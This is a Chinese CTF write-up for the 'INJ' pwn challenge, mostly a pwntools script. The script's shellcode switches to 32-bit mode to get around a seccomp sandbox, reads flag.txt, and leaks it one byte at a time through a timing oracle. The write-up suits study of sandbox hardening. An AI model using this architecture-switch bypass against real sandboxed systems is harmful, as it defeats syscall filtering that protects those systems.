上去看的时候队里的其他师傅已经把PWN写的只剩一题了,然后就半摆烂地把PWN最后那道INJ写了,最后也是被队里的大佬们带飞拿了第一
1st place!
INJ
题目的沙箱
利用shellcode切换至32位进行ORB。需要注意的是,远程open返回的文件描述符可能不是3,因此需要用 `mov ebx, eax` 来把open的返回值设置为read的fd。
| from pwn import *
context.binary = 'inj'

# `io` is a module-level global that pwn() rebinds on every connection; these
# wrappers only shorten the send calls against whatever tube is current.
sd = lambda x : io.send(x)
sa = lambda a, b : io.sendafter(a, b)
def pwn(ch):
    """Test whether *ch* is the next byte of the remote flag file.

    Sends a two-stage shellcode to the code-executor service. Stage 2 spins
    forever when the byte at ``flag.txt[len(flag)]`` equals ``ch`` and otherwise
    ``ret``s into an unprepared stack, so "connection still alive after 1 s"
    is the oracle. On a hit the character is appended to the module-level
    ``flag``.

    Returns True when the character was accepted, False otherwise.
    """
    global io
    global flag
    io = remote('35.233.85.116', 30020)
    # Stage 1 (x86-64 ABI): `mov al, 0xa` selects syscall 10 = mprotect on
    # rdi=0x404000 with len=0x404000 (esi copied from edi) and prot 7 (RWX);
    # this assumes the upper bytes of rax are already 0 -- TODO confirm.
    # Afterwards 0x80cd is pushed (little-endian bytes `cd 80`, i.e. a 2-byte
    # `int 0x80`), ecx is pointed at it, and `push 0x23 / push rcx / retfq`
    # far-returns through selector 0x23, the 32-bit compatibility code segment.
    # `add al, 3` presumably yields i386 syscall 3 = read if the value popped
    # from 0x4043E0 is 0 -- verify against the binary's memory layout.
    # Defender note: this mode switch is the sandbox bypass. A seccomp filter
    # that matches x86-64 syscall numbers without checking seccomp_data.arch
    # (or a blanket deny of non-native arches) does not constrain the i386
    # numbers used in stage 2; the challenge filter itself is not shown here.
    code = '''
    mov al, 0xa
    mov edi, 0x0000000000404000
    mov esi, edi
    push 7
    pop rdx
    syscall
    pop rdx
    mov esp, 0x00000000004043E0
    pop rax
    push 0x80cd
    mov ecx, esp
    push 0x23
    push rcx
    add al, 3
    retfq
    '''
    code = asm(code)
    sa('Welcome to my code executor!', code)
    # Stage 2 (i386 ABI via int 0x80): the pushes spell "flag.txt\0"
    # (0x67616c66 = "flag", 0x7478742e = ".txt"), eax=5 is open with ecx=0
    # (O_RDONLY). `mov ebx, eax` carries the returned fd into read's ebx instead
    # of assuming fd 3 -- the point called out in the write-up. eax=3 reads
    # 0x50 bytes into 0x4045E0, then `push 0x33 / push 0x404418 / retfq`
    # far-returns into the 64-bit code segment at 0x404418, presumed to be
    # where `loop:` ends up in the buffer -- confirm. The loop compares the
    # byte at offset len(flag) with ord(ch): equal -> spin forever, else `ret`.
    code = '''
    mov eax, 5
    push 0
    push 0x7478742e
    push 0x67616c66
    mov ebx, esp
    mov ecx, 0
    int 0x80
    mov ebx, eax
    mov eax, 3
    mov ecx, 0x00000000004045E0
    mov edx, 0x50
    int 0x80
    push 0x33
    push 0x404418
    retfq
    loop:
    mov rsi, 0x4045e0
    cmp byte ptr[rsi+{0}], {1}
    je loop
    ret
    '''.format(len(flag), ord(ch))
    # The 2-byte 'aa' pad presumably overwrites the `int 0x80` that stage 1's
    # read lands on, so execution falls through into stage 2 -- confirm.
    # NOTE(review): str + bytes concatenation only works under Python 2
    # pwntools; on Python 3 asm() returns bytes and this line raises TypeError.
    code = 'aa' + asm(code)
    sleep(1)
    sd(code)
    try:
        # pwntools recv(timeout=...) returns empty on timeout while the remote
        # is still spinning in `loop`; a closed connection (wrong byte) raises.
        io.recv(timeout = 1)
        flag += ch
        io.close()
        return True
    except:
        # Bare except also swallows KeyboardInterrupt; `except EOFError` is the
        # case actually relied on here.
        io.close()
        return False
# Recovered prefix so far; pwn() appends to it through `global flag`.
flag = ''
# Candidate alphabet tried at every position, in this order.
table = 'abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890{}-_@$&*!?.'

# Extend the prefix one character per pass; stop once the closing brace lands.
# NOTE: a position whose byte is not in `table` never advances, so this loop
# would re-run the same pass indefinitely.
while not flag.endswith('}'):
    for candidate in table:
        sleep(0.25)
        info('current flag: ' + flag)
        info('trying(' + candidate + ')')
        if not pwn(candidate):
            continue
        success('success(' + candidate + ')')
        break

success('final flag: ' + flag)